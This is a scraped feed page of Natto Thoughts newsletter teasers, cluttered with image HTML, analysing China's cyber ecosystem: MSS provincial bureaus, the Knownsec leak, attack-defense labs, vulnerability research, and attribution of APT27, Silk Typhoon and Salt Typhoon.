https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080 1456w" sizes="100vw"><img src="https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080" width="4272" height="2848" data-attrs="{"src":"https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080","srcNoWatermark":null,"fullscreen":null,"imageSize":null,"height":2848,"width":4272,"resizeWidth":null,"bytes":null,"alt":"a pile of paper with a pen on top of it","title":null,"type":"image/jpg","href":null,"belowTheFold":false,"topImage":true,"internalRedirect":null,"isProcessing":false,"align":null,"offset":false}" class="sizing-normal" alt="a pile of paper with a pen on top of it" title="a pile of paper with a pen on top of it" srcset="https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080 424w, https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080 848w, https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080 1272w, https://images.unsplash.com/photo-1633180888652-c561b86040f1?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wzMDAzMzh8MHwxfHNlYXJjaHw1M3x8d29yayUyMGhhcmR8ZW58MHx8fHwxNzY3NzE2MjMwfDA&ixlib=rb-4.1.0&q=80&w=1080 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Photo by <a href="https://unsplash.com/@jessica45">Jessica G.</a> on <a href="https://unsplash.com">Unsplash</a></figcaption></figure></div>Natto Thoughts had a great year in 2025, experiencing strong growth in both readership and collaboration. The Natto Team would like to thank our readers for making our in-depth explorations of China’s evolving cyber ecosystem our most-viewed reports of the year. Your support drives our research. We also want to thank <span class="mention-wrap" data-attrs="{"name":"Eugenio Benincasa","id":5401290,"type":"user","url":null,"photo_url":"https://substack-post-media.s3.amazonaws.com/public/images/09a1f79e-07d1-4938-9147-e0df8440802f_800x800.jpeg","uuid":"db8822bb-c731-4687-94d5-77593bfe9a7a"}" data-component-name="MentionToDOM"> and <span class="mention-wrap" data-attrs="{"name":"Dakota Cary","id":88878145,"type":"user","url":null,"photo_url":"https://substack-post-media.s3.amazonaws.com/public/images/f14100c6-832f-4739-84c8-88b8137c5382_400x400.jpeg","uuid":"af4734c9-6d88-43d6-af03-db21b098d6dd"}" data-component-name="MentionToDOM"> for their research collaboration efforts. Three of the top five reports resulted from this partnership.Collectively, these five reports provide a comprehensive overview of how China has formally institutionalized its cyber capabilities, resulting in a highly effective and state-aligned system—particularly highlighting the integrated role of the private sector.Here are the highlights from the top 5 reports:<ul><li>“<a href="https://nattothoughts.substack.com/p/defense-through-offense-mindset-from">Defense-Through-Offense Mindset: From a Taiwanese Hacker to the Engine of China’s Cybersecurity Industry</a>“: This report demonstrated how the guiding philosophy, “To defend, one must first know how to attack” (以攻为防), originated in 1990…</li></ul> <a href="https://www.nattothoughts.com/p/a-look-back-at-the-top-5-natto-thoughts"> Read more </a>
The Many Arms of the MSS: Why Provincial Bureaus Matter in China’s Cyber Operations

Tue, 16 Dec 2025 17:01:34 -0000

Provincial bureaus of the Chinese Ministry of State Security likely operate with their own tasking priorities, resources, and local ecosystems for cyber operations

<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!6kZQ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!6kZQ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!6kZQ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!6kZQ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!6kZQ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!6kZQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png" width="1024" height="1024" data-attrs="{"src":"https://substack-post-media.s3.amazonaws.com/public/images/58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png","srcNoWatermark":null,"fullscreen":null,"imageSize":null,"height":1024,"width":1024,"resizeWidth":null,"bytes":2518525,"alt":null,"title":null,"type":"image/png","href":null,"belowTheFold":false,"topImage":true,"internalRedirect":"https://nattothoughts.substack.com/i/181387803?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png","isProcessing":false,"align":null,"offset":false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!6kZQ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!6kZQ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!6kZQ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!6kZQ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F58ef68a6-8dd7-4c7a-b9e5-7a76a62e2ae5_1024x1024.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div>To defend systems, one must first pinpoint the source of malicious activity. Most cyber threat intelligence (CTI) firms focus on tactical and operational attribution: tactical attribution identifies and clusters technical details such as malware used, attack methods, or indicators of compromise, while operational attribution uses characteristics of activity clusters to infer group profiles and assigns labels like “APT” or “UNC.”<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> Strategic attribution goes further by identifying the real-world individuals or entities behind an intrusion.Some CTI experts <a href="https://www.robertmlee.org/the-problems-with-seeking-and-avoiding-true-attribution-to-cyber-attacks/">debate</a> the conditions under which strategic attribution is appropriate, while others <a href="https://www.uclalawreview.org/wp-content/uploads/securepdfs/2020/09/Eichensehr-67-3.pdf">highlight</a> the technical challenges of identifying threat actors, the political motivations behind public disclosure, and the legal standards required to assign responsibility. The Natto Team and <a href="https://www.amazon.com/Attribution-Advanced-Persistent-Threats-cyber-espionage/dp/3662613123">other</a> researchers believe that – compared to “cluster-based” tactical and operational attribution – the strategic identification of real-world individuals and o… <a href="https://www.nattothoughts.com/p/the-many-arms-of-the-mss-why-provincial"> Read more </a>
Knownsec: The King of Vulnerability Missed Three Vulnerabilities of Its Own

Wed, 03 Dec 2025 17:02:43 -0000

The leak incident involving Chinese cybersecurity firm Knownsec shows the company’s seemingly transparent crisis management strategy and underscores its position in the industry, but mysteries remain.

On November 5, 2025, a Chinese-language blog called <a href="https://archive.li/NNsWb#selection-347.3-347.169">Mrxn’s Blog</a> published a “massive” leak of information from Knownsec (知道创宇), a Chinese cybersecurity company. Mrxn claimed that the leak included 12,000 confidential documents, such as “China’s state-level cyber weapons, internal tool systems, and global target lists.” The blog provided sample screenshots of the leak and noted that the leaked information first appeared on the code-sharing platform GitHub, which subsequently removed it “for violating its terms of service.” The <a href="https://netaskari.substack.com/p/knownsec-breach-what-we-know-so-far">NETASKARI</a> Substack was among the first outlets to report in English on Mrxn’s blog post about the leak. <a href="https://netaskari.substack.com/p/knownsec-breach-what-we-know-so-far">NETASKARI</a>’s author, a freelance journalist based in Amsterdam, The Netherlands, provided a summary and analysis of the limited available leaked documents—including screenshots of product brochures, data collection lists, and a Knownsec company profile—and concluded there was no “smoking gun” or evidence of state-of-the-art tools used by Chinese state hackers. H… <a href="https://www.nattothoughts.com/p/knownsec-the-king-of-vulnerability"> Read more </a>
China’s Cybersecurity Companies Advancing Offensive Cyber Capabilities Through Attack-Defense Labs

Wed, 19 Nov 2025 17:03:09 -0000

Private-sector attack-defense labs form a core pillar of how China builds, sustains, and operationalizes cyber capability for commercial purposes and state-linked cyber operations.

Western governments are grappling with how private-sector offensive cyber capabilities should fit into state operations. This raises a number of practical <a href="https://www.govtech.com/blogs/lohrmann-on-cybersecurity/cyber-privateers-the-return-of-the-hack-back-debate">questions</a>: If a state tasked a company with carrying out cyber operations against an adversary, who inside those organizations would actually carry out offensive work?<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> How would these units be structured for government tasks? And how would offensive activity coexist with a company’s day-to-day R&D and commercial operations?In China, these questions are far less abstract. Private companies have been core contributors to national cyber capability building for years, supported by both policy and institutional design. They develop many of the tools, techniques, and forms of expertise that underpin defensive security products and can also be leveraged for state-sponsored cyber operations. The clearest organizational expression of this approach is companies’ widespread use of attack-defense labs (攻防实验室), internal units that merge defensiv… <a href="https://www.nattothoughts.com/p/chinas-cybersecurity-companies-advancing"> Read more </a>
A Researcher Came Knocking, and Taught China a Lesson in How to Manage Vulnerabilities and Researchers

Wed, 05 Nov 2025 17:02:57 -0000

A TCL TV vulnerability disclosure drove home the message: to protect its economic and political clout, China must heed global vulnerability researchers' warnings and cultivate Chinese researchers

In the last few days of October 2025 in Asia, <a href="https://www.youtube.com/watch?v=6wU7nfqJ2SI">gift-giving</a> between top political leaders has drawn a lot of attention—and <a href="https://www.youtube.com/watch?v=1KdW6wjfTCY&t=56s">laughter</a>. One moment, which surprised many of us, was when Chinese President Xi Jinping showed humor during his gift exchange with South Korean President Lee Jae Myung. It is rare to see a Chinese leader “<a href="https://www.nytimes.com/2025/11/02/world/asia/xi-jinping-china-south-korea-spying.html">speaking off the cuff in public</a>.” On this occasion, President Xi joked about backdoors in cellphones—yes, <a href="https://csrc.nist.gov/glossary/term/backdoor">backdoors</a> that can monitor or access the information in mobile devices.During his first <a href="https://web.archive.org/web/20251104150038/https:/www.fmprc.gov.cn/eng/xw/zyxw/202511/t20251101_11745458.html">state visit</a> to South Korea after 11 years, Xi presented two Chinese-made Xiaomi brand smartphones—the world’s <a href="https://counterpointresearch.com/en/insights/global-smartphone-share">third-largest</a> smartphone brand—to South Korean President Lee Jae Myung. When Lee asked delightedly about the quality of communication and the security of the phone, Xi smiled and said, “You can check if there is a backdoor.”President Xi is undoubtedly fully aware that the United States and its allies have warned that Chinese technology may contain <a href="https://selectcommitteeontheccp.house.gov/media/press-releases/gallagher-urges-us-navy-exchange-remove-ccp-linked-computers-stores">backdoors</a>—what the … <a href="https://www.nattothoughts.com/p/what-a-narrative-control-failure"> Read more </a>
Beyond the Aliases: Decoding Chinese Threat Group Attribution and the Human Factor

Wed, 22 Oct 2025 16:02:27 -0000

Examining the overlap between APT27, HAFNIUM, and Silk Typhoon through recent U.S. government disclosures, and why understanding the humans behind the keyboard is important for cyber defenders

Since March 2025, the U.S. government has exposed Chinese hackers and entities linked to threat groups publicly tracked as APT27, HAFNIUM, Silk Typhoon, and other threat group monikers. Among these named Advanced Persistent Threat (APT) groups, technical analysis and observed intrusion activities from the cybersecurity community have provided group tracking criteria and measures to mitigate harm and to eradicate malware from systems and networks. Because cybersecurity firms often use different threat models, have their own standards for clustering intrusions, and closely guard their <a href="https://www.proofpoint.com/us/threat-reference/telemetry">telemetry data</a>—often not sharing with others—we see threat groups labeled with a number of “a.k.a.” (also known as) group names. For example, the <a href="https://malpedia.caad.fkie.fraunhofer.de/actor/apt27">profile of APT27</a> on Malpedia, a community-curated online malware encyclopedia and resource, lists 16 a.k.a. group names. How do these a.k.a. groups overlap? How are they different from one another? The answers are not always clear.Additionally, when law enforceme… <a href="https://www.nattothoughts.com/p/beyond-the-aliases-decoding-chinese"> Read more </a>
China’s Vulnerability Research: What’s Different Now?

Wed, 08 Oct 2025 16:02:33 -0000

China’s bug-hunting scene is maturing - more players, bigger prizes, tighter structure, and a growing focus on domestic products, driven by profit, prestige, and national security.

Over the past two decades, China’s vulnerability research ecosystem has undergone a dramatic transformation. <a href="https://nattothoughts.substack.com/p/no-ranges-no-bounties-no-contests">In the early 2000s</a>, it was a fragmented landscape of free databases and easily accessible, low-cost exploits. Over time, it evolved toward commercialization, with organized vulnerability markets and institutional research labs emerging within major tech and cybersecurity companies.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> By the mid-2010s, Chinese hackers were <a href="https://ethz.ch/content/dam/ethz/special-interest/gess/cis/center-for-securities-studies/pdfs/cyber-report-2024-from-vegas-to-chengdu.pdf">competing – and excelling –</a> in global exploit hacking contests<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-2" href="#footnote-2" target="_self">2</a> and bug bounty programs<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-3" href="#footnote-3" target="_self">3</a> to identify weak spots in Western products.As this ecosystem has evolved, the Chinese state moved to harness the vulnerability research for national priorities through both formal and informal channels. From the top down, it imposed institutional mechanisms such as direct oversight of researchers and regulations that mandate or incentivize reporting to state-run entities. From the bottom up, informal networks among prominent researchers, who exchange insights and acquisition o… <a href="https://www.nattothoughts.com/p/chinas-vulnerability-research-whats"> Read more </a>
Who is Salt Typhoon Really? Unraveling the Attribution Challenge

Wed, 24 Sep 2025 16:08:09 -0000

How overlapping APT groups and Chinese companies complicate attribution in state cyber operations

Our <a href="https://nattothoughts.substack.com/p/salt-typhoon-new-joint-advisory-offers">previous post</a> about Salt Typhoon provided an initial commentary on the <a href="https://media.defense.gov/2025/Aug/22/2003786665/-1/-1/0/CSA_COUNTERING_CHINA_STATE_ACTORS_COMPROMISE_OF_NETWORKS.PDF">Joint Cybersecurity Advisory</a> on Salt Typhoon issued on August 27, 2025. The advisory identified three Chinese companies - <a href="https://nattothoughts.substack.com/i/155370638/sichuan-juxinhes-area-of-focus-communication-system-services-aligns-with-salt-typhoon-targeting">Sichuan Juxinhe Network Technology Co. Ltd</a>. (四川聚信和网络科技有限公司), <a href="https://nattothoughts.substack.com/i/173242203/beijing-huanyu-tianqiong-as-a-front-company-changing-business-scopes-to-meet-client-needs">Beijing Huanyu Tianqiong Information Technology Co., Ltd</a><a href="https://nattothoughts.substack.com/i/173242203/beijing-huanyu-tianqiong-as-a-front-company-changing-business-scopes-to-meet-client-needs">.</a> (北京寰宇天穹信息技术有限公司), and <a href="https://nattothoughts.substack.com/i/173242203/sichuan-zhixin-ruijie-as-a-real-business-lacking-a-company-webpage-but-engaged-in-dedicated-contract-work">Sichuan Zhixin Ruijie Network Technology Co., Ltd</a>. (四川智信锐捷网络科技有限公司) - as suppliers of products and services to Salt Typhoon and other overlapping groups such as OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor. After examining these three Chinese companies and their possible roles in Salt Typhoon-related cyber operations, we presented a few questions worth further exploration. In this post, we will address questions about the involvement of Chinese companies in state-sponsored cyber operations and share some observations on threat attribution from the joint advisory.<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!gpjA!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!gpjA!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png 424w, https://substackcdn.com/image/fetch/$s_!gpjA!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png 848w, https://substackcdn.com/image/fetch/$s_!gpjA!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png 1272w, https://substackcdn.com/image/fetch/$s_!gpjA!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!gpjA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png" width="645" height="469" data-attrs="{"src":"https://substack-post-media.s3.amazonaws.com/public/images/06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png","srcNoWatermark":null,"fullscreen":null,"imageSize":null,"height":469,"width":645,"resizeWidth":null,"bytes":291965,"alt":null,"title":null,"type":"image/png","href":null,"belowTheFold":false,"topImage":true,"internalRedirect":"https://nattothoughts.substack.com/i/174415649?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png","isProcessing":false,"align":null,"offset":false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!gpjA!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png 424w, https://substackcdn.com/image/fetch/$s_!gpjA!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png 848w, https://substackcdn.com/image/fetch/$s_!gpjA!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png 1272w, https://substackcdn.com/image/fetch/$s_!gpjA!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06d2d4d7-087f-4451-99af-0a8bf74fb309_645x469.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h1>First, an update: The Company Webpage of Sichuan Zhixin Ruijie is Found</h1>Previously, the… <a href="https://www.nattothoughts.com/p/who-is-salt-typhoon-really-unraveling"> Read more </a>
Salt Typhoon: New Joint Advisory Offers a Beacon Through the Storm but Stirs Up New Questions

Wed, 10 Sep 2025 16:03:20 -0000

Analysis of newly identified Salt Typhoon-linked companies casts light on the complex ecosystem of front companies and real businesses supporting Chinese state cyber operations

<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ctsD!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ctsD!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png 424w, https://substackcdn.com/image/fetch/$s_!ctsD!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png 848w, https://substackcdn.com/image/fetch/$s_!ctsD!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!ctsD!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ctsD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png" width="1456" height="971" data-attrs="{"src":"https://substack-post-media.s3.amazonaws.com/public/images/c8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png","srcNoWatermark":null,"fullscreen":null,"imageSize":null,"height":971,"width":1456,"resizeWidth":null,"bytes":2082888,"alt":null,"title":null,"type":"image/png","href":null,"belowTheFold":false,"topImage":true,"internalRedirect":"https://nattothoughts.substack.com/i/173242203?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png","isProcessing":false,"align":null,"offset":false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ctsD!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png 424w, https://substackcdn.com/image/fetch/$s_!ctsD!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png 848w, https://substackcdn.com/image/fetch/$s_!ctsD!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!ctsD!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc8f16a8d-9f17-4b85-89bd-91fbc76f7be6_1536x1024.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" 